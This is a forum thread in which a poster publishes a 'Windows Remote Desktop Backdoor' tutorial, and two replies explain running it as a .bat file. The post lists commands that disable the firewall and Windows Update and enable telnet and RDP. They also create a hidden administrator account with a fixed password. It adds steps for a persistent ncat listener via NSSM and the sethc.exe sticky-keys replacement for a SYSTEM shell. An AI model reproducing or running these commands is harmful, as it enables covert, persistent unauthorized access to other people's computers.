Windows Remote Desktop Backdoor

Discussion in 'Network' started by Asphyxia, Oct 18, 2016.

  1. Asphyxia

    Asphyxia Web Admin Administrator Moderator

    Non-Sucking Service Manager //
    NCAT //

    I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

    1. Run all of this shit:
    sc config wuauserv start= disabled
    net stop wuauserv
    netsh firewall set opmode disable
    sc config tlntsvr start= auto
    net start telnet
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user support1 passwordA!1 /add
    net localgroup "Administrators" /add support1
    net localgroup "Users" /del support1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
    net user support1 passwordA!1 /add --- this line creates the user with the username of support1.
    I grabbed this from:

    2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff:
    You need to register to view spoilers!

    3. Go ahead and try it, if it doesn't work try to reboot/restart the server and it should work or at least try stopping and starting the termservice.

    Is the location of the Remote Desktop port, if you find a program that is running on port 8080 or even port 80 and switch over the Remote Desktop port to 80/8080... this bypasses the need to port forward and since by default you can't back-connect or reverse-connect using remote desktop, this makes sense.

    Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy.

    Alternatively you may be interested in enabling the Remote Desktop service, change sethc.exe inside the Windows System files to sethcbk.exe and copy cmd.exe to sethc.exe -- you will now connect to remote desktop and so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap shift 5 times and enjoy having a cmd window open with system level access. A simple and silly Windows fail.
    Last edited: Oct 18, 2016
  2. Ch4ch4rR4t0

    Ch4ch4rR4t0 Member

    How exec this func rule 1- ? in cmd? '-'
  3. naturenmoon

    naturenmoon New Member

    You can run these codes with "a bat file" (you can create a bat file easily) and than copy these codes and paste into the ".bat file" and RUN IT ;)
    That's all

Share This Page